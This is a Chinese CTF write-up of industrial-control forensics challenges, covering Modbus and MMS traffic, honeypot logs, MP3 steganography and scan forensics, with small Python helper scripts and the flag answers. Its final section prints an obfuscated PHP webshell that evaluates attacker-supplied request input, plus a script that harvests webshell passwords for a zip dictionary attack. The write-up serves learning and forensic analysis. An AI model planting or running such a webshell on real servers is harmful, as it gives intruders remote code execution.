纵横网络靶场 刷题记录

news/2024/5/2 18:00:22/文章来源:https://blog.csdn.net/qq_61778128/article/details/126619109

目录

Modbus协议

MMS协议分析

大工UDP协议

工控蜜罐日志分析

隐信道数据安全分析

工控安全取证

隐藏的黑客


Modbus协议

黑客通过外网进入一家工厂的控制网络,之后对工控网络中的操作员站系统进行了攻击,最终通过工控协议破坏了正常的业务。我们得到了操作员站在攻击前后的网络流量数据包,我们需要分析流量中的蛛丝马迹

题目说他通过协议破坏了正常的业务,也就是功能码写入或者修改了寄存器数据

寄存器功能码
03:读取
06:写入单个
16:写入多个

wireshark语句查询到存在写入

得到flag{TheModbusProtocolIsFunny!}

MMS协议分析

工业网络中存在的异常,尝试通过分析PACP流量包,分析出流量数据中的异常 点

根据长度发现一个特别长的流量包

里面是base64编码,看样子是base64编码的图片

点这里可以导出右侧的字符串部分

浏览器显示 flag{ICS-mms104}

或者找转换工具都行

大工UDP协议

在进行工业企业检查评估工作中,发现了疑似感染恶意软件的上位机。现已提取出上位机通信流量,尝试分析出异常点

udp contains "flag" 进行过滤

 

追踪udp流

666c6,flag的16进制,转换一下得到

 

工控蜜罐日志分析

工控安全分析人员在互联网上部署了工控仿真蜜罐,通过蜜罐可抓取并分析互联网上针对工业资产的扫描行为,将存在高危扫描行为的IP加入防火墙黑名单可有效减少工业企业对于互联网的攻击面。分析出日志中针对西门子私有通信协议扫描最多的IP,分析该扫描组织,Flag为该IP的域名

指的就是这个协议

 

脚本处理

from re import *
​
with open('honeypot.log', 'r') as f:mydict, iplist = {}, []lines = f.readlines()for line in lines:if 's7' in line.lower():iplist += findall(r'[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}', line)else:passfor ip in iplist:mydict[ip] = mydict.get(ip, 0) + 1res = sorted(mydict.items(), key=lambda item: item[1], reverse=True)num = 0for data in res:num += 1print('{0}: {1}'.format(num, data))

结果:

 

ip反查域名

 

隐信道数据安全分析

安全分析人员截获间谍发的秘密邮件,该邮件只有一个MP3文件,安全人员怀疑间谍通过某种private的方式将信息传递出去,尝试分析该文件,获取藏在文件中的数据

010里面发现题目描述的private

 

from binascii import *
​
with open('flag-woody.mp3', 'rb') as f:init_mpeg_hdr = 0x1c1b8mpeg_data_block = 0x0flag = ''while True:next_mpeg_hdr = init_mpeg_hdr + mpeg_data_blockf.seek(next_mpeg_hdr)bin_data = bin(int(hexlify(f.read(4)), 16))[2:]flag += bin_data[23]mpeg_data_block += 0x414if int(str(next_mpeg_hdr), 16) > len(f.read()):breakfor i in range(0, len(flag), 8):try:res_flag = chr(int(flag[i:i+8], 2))print(res_flag,end="")except:pass

flag{pr1v4t3_bi7}

工控安全取证

有黑客入侵工控设备后在内网发起了大量扫描,而且扫描次数不止一次。 请分析日志,指出对方第4次发起扫描时的数据包的编号

这个文件本质是一个pcap文件,拖进wireshark进行分析, 发现了192.168.0.9192.168.0.199192.168.0.1192.168.0.254共四个,流量包前面大部分都是192.168.0.9在进行SYN扫描192.168.0.99

 

分别截取,每个IP扫描前,都进行了Ping操作,即第一次扫描都是Ping扫描。

所以第四个IP第一次扫描的包编号为:155989;源IP地址为:192.168.0.199

flag{155989}

192.168.0.1

 

192.168.0.199

 

192.168.0.9

 

192.168.0.254

 

针对wireshark最常用的自然是针对IP地址的过滤。其中有几种情况:
​
(1)对源地址为192.168.0.1的包的过滤,即抓取源地址满足要求的包。表达式为:ip.src == 192.168.0.1
(2)对目的地址为192.168.0.1的包的过滤,即抓取目的地址满足要求的包。表达式为:ip.dst == 192.168.0.1
(3)对源或者目的地址为192.168.0.1的包的过滤,即抓取满足源或者目的地址的ip地址是192.168.0.1的包。表达式为:ip.addr == 192.168.0.1,或者 ip.src == 192.168.0.1 or ip.dst == 192.168.0.1
(4)过滤地址段。
表达式为:ip.addr == 192.168.0.0/24
(5)要排除以上的数据包,我们只需要将其用括号囊括,然后使用 “!” 即可。表达式为:!(表达式)

隐藏的黑客

根据情报得知工控现场发现某SCADA系统被黑客攻破,附件为黑客在目录留下的文件和当时时间段捕获到的一部分流量包,你能根据这些信息分析出蛛丝马迹来么

追踪一下http的包,发现有webshell的压缩包

 

导入010存储为1.zip

 

但是是需要密码的

写个脚本获取upload文件中每个webshell的登陆密码

import os,sys
import reif __name__ == '__main__':a = []for i in os.listdir('./upload'):with open('./upload/'+i,'r') as f:passwd = re.findall('\[(.*?)\]',f.readline())[0]a.append(passwd)with open('passwd.txt','a+') as f:for i in a:f.write(i+'\n')

获取到密码本,进行字典爆破

 

爆出密码

 

webshell.php:

<?php
​
error_reporting(0);
​
@$c = array("1JFUVVFU1RbJzlhNzJjM","2Q1ZTc0ZjYwNTFiYjNiMzU","5MGZhOTMxOWZlJ10pOw","MGZhOTMxOWZlJ","MGZhOTMxOWZlJ");
@$str="ZXZhbCgkX";
@$o0o00o00o00o0o0 = chr(97).chr(115).chr(115).chr(101).chr(114).chr(116);
@$ooo00o0o0o0o0o0 = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);
@$count = 0;
for($x=0;$x<=9;$x++){if (in_array($x, @$c)){@$str=@$str.@$c[@$count];if ($count == 2){       @$o0o00o00o00o0o0(@$ooo00o0o0o0o0o0(@$str));}@$count++;}
}
?>

flag{9a72c3d5e74f6051bb3b3590fa9319fe}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_3842.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Linux学习笔记

Linux安装在VM上 直接安装即可&#xff0c;或者打开VMX文件&#xff0c;挂载到VM上 Linux的目录结构 /代表根目录。~不同的用户&#xff0c;代表的目录不同。 超级管理员用户&#xff1a;root&#xff0c;终端中显示~&#xff0c;表示/root目录 普通用户&#xff1a;在hom…

手写一个泛型双向链表

前言 在当前大环境的背景下面试不问点算法都不算个合格的面试了&#xff08;卷&#xff09;&#xff0c;而与算法紧密相关的数据结构也是经常问到的&#xff0c;像集合、链表、树、图、栈、堆、队列、矩阵 等等等等。 是不是感觉难度如下&#xff1a; 集合&#xff1a;有手就…

分布式缓存Hazelcast的部署及与SpringBoot整合使用

目录一、简介二、安装2.1 使用Docker形式部署2.2 客户端命令行2.3 Web管理页面三、与SpringBoot项目整合3.1 pom依赖3.2 配置类3.3 使用方式一、简介 官方文档&#xff1a;https://docs.hazelcast.com/hazelcast/latest/clients/java Github地址:https://github.com/hazelcast…

《MeInGame: Create a Game Character Face from a Single Portrait 》论文解读

一&#xff1a;论文干了件什么事 从单张图片生成一个游戏中的虚拟形象&#xff0c;且&#xff0c;论文的方法对光照强度&#xff0c;光照阴影遮挡等具有很好的鲁棒性&#xff0c;可以忠实还原肤色、妆容和皱纹等个性化细节。 摘要&#xff1a; 近年来&#xff0c;基于深度学习…

使用iptables动态映射Docker容器端口

0x0. 安装telnet telnet介绍&#xff1a;https://zh.wikipedia.org/wiki/Telnet 本文用于测试指定端口是否开放&#xff0c;命令如下&#xff1a; telnet [ip] [port]参数解释&#xff1a; ip&#xff1a;ip地址port&#xff1a;端口 如果指定端口开放则结果如下&#xff1a…

Libra论文阅读笔记-A unified congestion control framework for diverse application

目录一、Overview二、问题背景三、Libra方案overview四、Libra方案设计五、RL-based CCA算法总结论文题目&#xff1a;《A unified congestion control framework for diverse application preferences and network conditions》 CoNEXT’21 一、Overview 目前的拥塞控制算法(…

Python代码优化工具——memory_profiler

Python代码优化工具——memory_profiler一、工具介绍二、安装三、分析结果注解四、使用1、使用python命令进行分析&#xff08;1&#xff09;使用姿势1&#xff08;2&#xff09;示例1&#xff08;3&#xff09;该姿势的利弊1&#xff08;4&#xff09;使用姿势2&#xff08;5&…

Python 程序员过中秋

Python 程序员过中秋 又是一年中秋至-----花好月圆夜&#xff0c;佳文当共鉴。Python PyQt5制作音乐播放界面 CSDN官方活动征文入口 文章目录1. 引言1.1 编写目的1.2 术语1.3 项目开发环境2. 业务概述3.PyQt5简单介绍3.1 手机上的Qt无处不在3.2 惊人的图形能力和性能3.3 Qt 5…

多线程编程(二):List组装

在日常工作中&#xff0c;难免遇到在循环体中组装List的场景&#xff0c;一般来说&#xff0c;不考虑多线程的话&#xff0c;实现起来非常简单。 比如&#xff0c;拟定一个场景&#xff0c;给定0-9999&#xff0c;共10000个数字&#xff0c;组装2个列表&#xff1a;奇数列表、…

Windows与网络基础-7-windows基本命令-目录文件操作

Windows基础命令 目录 一、目录和文件的应用操作 1.1 cd命令 1.2 dir命令 1.3 md或mkdir 1.4rd或rmdir 1.5 move 1.6 copy 1.7 Xcopy 1.8 Del或rease 目标&#xff1a; 掌握windwos系统文件及目录操作的一些命令 掌握windwos网络相关的命令 Window输入命令&#xff…

odoo15 联系人只看自己的设置注意点

今天设置crm模块权限时,联系人单加一个权限,不起作用 经反复设置,最后发现,最后一条无论如何设,不起作用。 class Partner(models.Model):_description = Contact_inherit = [format.address.mixin, avatar.mixin]_name = "res.partner"_order = "displa…

python神经网络编程 豆瓣,用python构建神经网络

python深度学习框架学哪个 Python深度学习生态系统在这几年中的演变实属惊艳。pylearn2&#xff0c;已经不再被积极地开发或者维护&#xff0c;大量的深度学习库开始接替它的位置。这些库每一个都各有千秋。 我们已经在indico的产品或者开发中使用了以下列表中的大部分的技术…

Django-(2)

今日内容概览 静态文件及相关配置请求方法request对象方法pycharm连接MySQLDjango谅解MySQLDjango ormorm语法orm外键关联 静态文件及相关配置 静态文件&#xff1a;html页面上使用的&#xff0c;不会进程改变的资源 第三方框架文件css文件js文件图片文件 针对静态文件资源…

token、cookie、session

目录 cookie session token cookie和token对比 刚刚下班的时候&#xff0c;路上碰到以前带的新人&#xff0c;他说他们那边最近在给一个新系统做新的权限校验&#xff0c;采用JWT的方式&#xff0c;这个新人也做没多久&#xff0c;说自己不了解token、cookie、session的区别…

datawhale8月组队学习《pandas数据处理与分析》(中)(变形、连接、缺失数据)

文章目录五、变形5.1 长宽表变形5.1 pivot5.2 pivot_table 处理非唯一值5.3 melt&#xff08;宽表变长表&#xff09;5.4 wide_to_long5.2 索引的变形5.3 其他变形函数5.3.1 crosstab5.3.2 explode5.3.3 get_dummies5.4 第五章练习5.4.1 美国非法药物数据集5.4.2 特殊的wide_to…

mfc 改变字体颜色

笔者最新的项目是mfc开发的&#xff0c;现在好多软件为了支持国产化操作系统&#xff0c;就客户端界面开发都使用了QT&#xff0c;底层的数据都用纯c实现了。 这里记录下&#xff0c;OnCtlColor(控件颜色事件)&#xff0c;mfc的事件很多&#xff0c;毕竟其一大特色为消息映射机…

Ubuntu更新内核

ubuntu查看当前内核 sudo uname -r如图&#xff1a;内核版本为4.4 方式一&#xff1a;下载.deb包并执行安装 在此网站上查找所需内核版本 Index of /~kernel-ppa/mainline 下载对应内核版本的.deb &#xff0c;如图标号为 1、2、3、4、的 注意&#xff1a;cpu为64架构 选择am…

【无标题】产品经理基础--08交互说明撰写方法

交互说明撰写方法 文章目录交互说明撰写方法一、基本交互形式二、交互说明规范三、全局说明四、交互说明的撰写方法五、PRD文档一、基本交互形式 交互说明可以看做交互设计师或产品经理输出的最核心的“产品”&#xff1b; 交互说明面向的“用户”是下游的同事 —— UI设计师、…

数据结构之图

1.图的定义 &#xff08;1&#xff09;图是一种网状数据结构&#xff0c;图是由非空的顶点集合和一个描述顶点之间关系的集合组成. &#xff08;2&#xff09;其形式化的定义如下&#xff1a;Graph (V,E) &#xff08;3&#xff09;加权图 ①在实际应用中&#xff0c;图不但…

【人工智能】神经网络八股扩展

回顾tf.keras搭建神经网络八股的六步法 神经网络八股学习笔记 import train,test Sequential/Class model.compile model.fit model.summary 本文内容概述 自制数据集&#xff0c;解决本领域的应用数据增强&#xff0c;扩充数据集断点续训&#xff0c;存取模型参数提取&#x…